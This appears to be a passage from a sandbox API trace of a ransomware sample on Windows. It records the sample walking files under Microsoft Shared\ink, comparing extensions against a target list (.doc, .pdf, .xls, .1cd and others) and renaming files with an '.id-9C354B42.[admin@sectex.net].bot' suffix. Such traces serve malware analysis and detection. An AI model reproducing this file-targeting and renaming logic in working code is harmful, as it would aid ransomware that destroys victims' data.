	[0138.259] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.259] lstrlenW (lpString=".dbf") returned 4
	[0138.259] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.259] lstrlenW (lpString=".1cd") returned 4
	[0138.259] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.260] lstrlenW (lpString=".jpg") returned 4
	[0138.260] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.260] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0138.260] lstrlenW (lpString="split.avi") returned 9
	[0138.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.260] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=194048) returned 1
	[0138.260] CloseHandle (hObject=0x2fc) returned 1
	[0138.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20
	[0138.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.261] lstrlenW (lpString=".doc") returned 4
	[0138.261] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString=".docx") returned 5
	[0138.261] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.261] lstrlenW (lpString=".pdf") returned 4
	[0138.261] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString=".xls") returned 4
	[0138.261] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString=".xlsx") returned 5
	[0138.261] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.261] lstrlenW (lpString=".ppt") returned 4
	[0138.261] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.261] lstrlenW (lpString=".zip") returned 4
	[0138.261] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString=".rar") returned 4
	[0138.261] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString=".bz2") returned 4
	[0138.261] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString=".7z") returned 3
	[0138.261] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.261] lstrlenW (lpString=".dbf") returned 4
	[0138.261] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.261] lstrlenW (lpString=".1cd") returned 4
	[0138.261] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.261] lstrlenW (lpString=".jpg") returned 4
	[0138.261] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.262] lstrlenW (lpString=".doc") returned 4
	[0138.262] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString=".docx") returned 5
	[0138.262] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.262] lstrlenW (lpString=".pdf") returned 4
	[0138.262] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString=".xls") returned 4
	[0138.262] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString=".xlsx") returned 5
	[0138.262] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.262] lstrlenW (lpString=".ppt") returned 4
	[0138.262] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.262] lstrlenW (lpString=".zip") returned 4
	[0138.262] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString=".rar") returned 4
	[0138.262] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString=".bz2") returned 4
	[0138.262] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString=".7z") returned 3
	[0138.262] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.262] lstrlenW (lpString=".dbf") returned 4
	[0138.262] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.262] lstrlenW (lpString=".1cd") returned 4
	[0138.262] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66
	[0138.263] lstrlenW (lpString=".jpg") returned 4
	[0138.263] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.263] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0138.263] lstrlenW (lpString="FlickAnimation.avi") returned 18
	[0138.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.263] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1600388) returned 1
	[0138.263] CloseHandle (hObject=0x2fc) returned 1
	[0138.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20
	[0138.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.263] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.264] lstrlenW (lpString=".doc") returned 4
	[0138.264] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString=".docx") returned 5
	[0138.264] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0138.264] lstrlenW (lpString=".pdf") returned 4
	[0138.264] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString=".xls") returned 4
	[0138.264] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString=".xlsx") returned 5
	[0138.264] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0138.264] lstrlenW (lpString=".ppt") returned 4
	[0138.264] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.264] lstrlenW (lpString=".zip") returned 4
	[0138.264] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString=".rar") returned 4
	[0138.264] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString=".bz2") returned 4
	[0138.264] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString=".7z") returned 3
	[0138.264] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.264] lstrlenW (lpString=".dbf") returned 4
	[0138.264] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.264] lstrlenW (lpString=".1cd") returned 4
	[0138.264] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.264] lstrlenW (lpString=".jpg") returned 4
	[0138.264] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.265] lstrlenW (lpString=".doc") returned 4
	[0138.265] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString=".docx") returned 5
	[0138.265] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0138.265] lstrlenW (lpString=".pdf") returned 4
	[0138.265] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString=".xls") returned 4
	[0138.265] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString=".xlsx") returned 5
	[0138.265] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0138.265] lstrlenW (lpString=".ppt") returned 4
	[0138.265] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.265] lstrlenW (lpString=".zip") returned 4
	[0138.265] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString=".rar") returned 4
	[0138.265] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString=".bz2") returned 4
	[0138.265] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString=".7z") returned 3
	[0138.265] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.265] lstrlenW (lpString=".dbf") returned 4
	[0138.265] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.265] lstrlenW (lpString=".1cd") returned 4
	[0138.265] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69
	[0138.265] lstrlenW (lpString=".jpg") returned 4
	[0138.265] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.266] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.266] lstrlenW (lpString="auxbase.xml") returned 11
	[0138.266] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.266] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1434) returned 1
	[0138.266] CloseHandle (hObject=0x2fc) returned 1
	[0138.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20
	[0138.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.267] lstrlenW (lpString=".doc") returned 4
	[0138.267] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.267] lstrlenW (lpString=".docx") returned 5
	[0138.267] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0138.267] lstrlenW (lpString=".pdf") returned 4
	[0138.267] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.267] lstrlenW (lpString=".xls") returned 4
	[0138.267] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.267] lstrlenW (lpString=".xlsx") returned 5
	[0138.267] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0138.267] lstrlenW (lpString=".ppt") returned 4
	[0138.267] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.267] lstrlenW (lpString=".zip") returned 4
	[0138.267] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.267] lstrlenW (lpString=".rar") returned 4
	[0138.267] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.267] lstrlenW (lpString=".bz2") returned 4
	[0138.267] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.267] lstrlenW (lpString=".7z") returned 3
	[0138.267] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.268] lstrlenW (lpString=".dbf") returned 4
	[0138.268] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.268] lstrlenW (lpString=".1cd") returned 4
	[0138.268] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.268] lstrlenW (lpString=".jpg") returned 4
	[0138.268] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.268] lstrlenW (lpString=".doc") returned 4
	[0138.268] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString=".docx") returned 5
	[0138.268] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1
	[0138.268] lstrlenW (lpString=".pdf") returned 4
	[0138.268] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString=".xls") returned 4
	[0138.268] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString=".xlsx") returned 5
	[0138.268] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1
	[0138.268] lstrlenW (lpString=".ppt") returned 4
	[0138.268] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.268] lstrlenW (lpString=".zip") returned 4
	[0138.268] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.268] lstrlenW (lpString=".rar") returned 4
	[0138.268] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString=".bz2") returned 4
	[0138.268] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.268] lstrlenW (lpString=".7z") returned 3
	[0138.268] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.268] lstrlenW (lpString=".dbf") returned 4
	[0138.269] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.269] lstrlenW (lpString=".1cd") returned 4
	[0138.269] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83
	[0138.269] lstrlenW (lpString=".jpg") returned 4
	[0138.269] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.269] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.269] lstrlenW (lpString="auxpad.xml") returned 10
	[0138.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.270] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=212) returned 1
	[0138.270] CloseHandle (hObject=0x2fc) returned 1
	[0138.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20
	[0138.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.270] lstrlenW (lpString=".doc") returned 4
	[0138.270] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.270] lstrlenW (lpString=".docx") returned 5
	[0138.270] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1
	[0138.270] lstrlenW (lpString=".pdf") returned 4
	[0138.270] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.270] lstrlenW (lpString=".xls") returned 4
	[0138.271] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString=".xlsx") returned 5
	[0138.271] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1
	[0138.271] lstrlenW (lpString=".ppt") returned 4
	[0138.271] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.271] lstrlenW (lpString=".zip") returned 4
	[0138.271] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.271] lstrlenW (lpString=".rar") returned 4
	[0138.271] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString=".bz2") returned 4
	[0138.271] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString=".7z") returned 3
	[0138.271] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.271] lstrlenW (lpString=".dbf") returned 4
	[0138.271] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.271] lstrlenW (lpString=".1cd") returned 4
	[0138.271] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.271] lstrlenW (lpString=".jpg") returned 4
	[0138.271] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.271] lstrlenW (lpString=".doc") returned 4
	[0138.271] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.271] lstrlenW (lpString=".docx") returned 5
	[0138.271] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1
	[0138.271] lstrlenW (lpString=".pdf") returned 4
	[0138.271] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.272] lstrlenW (lpString=".xls") returned 4
	[0138.272] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.272] lstrlenW (lpString=".xlsx") returned 5
	[0138.272] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1
	[0138.272] lstrlenW (lpString=".ppt") returned 4
	[0138.272] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.272] lstrlenW (lpString=".zip") returned 4
	[0138.272] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.272] lstrlenW (lpString=".rar") returned 4
	[0138.272] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.272] lstrlenW (lpString=".bz2") returned 4
	[0138.272] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.272] lstrlenW (lpString=".7z") returned 3
	[0138.272] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.272] lstrlenW (lpString=".dbf") returned 4
	[0138.272] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.272] lstrlenW (lpString=".1cd") returned 4
	[0138.272] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0138.272] lstrlenW (lpString=".jpg") returned 4
	[0138.272] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.272] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.272] lstrlenW (lpString="ea.xml") returned 6
	[0138.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.273] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=384) returned 1
	[0138.273] CloseHandle (hObject=0x2fc) returned 1
	[0138.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20
	[0138.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
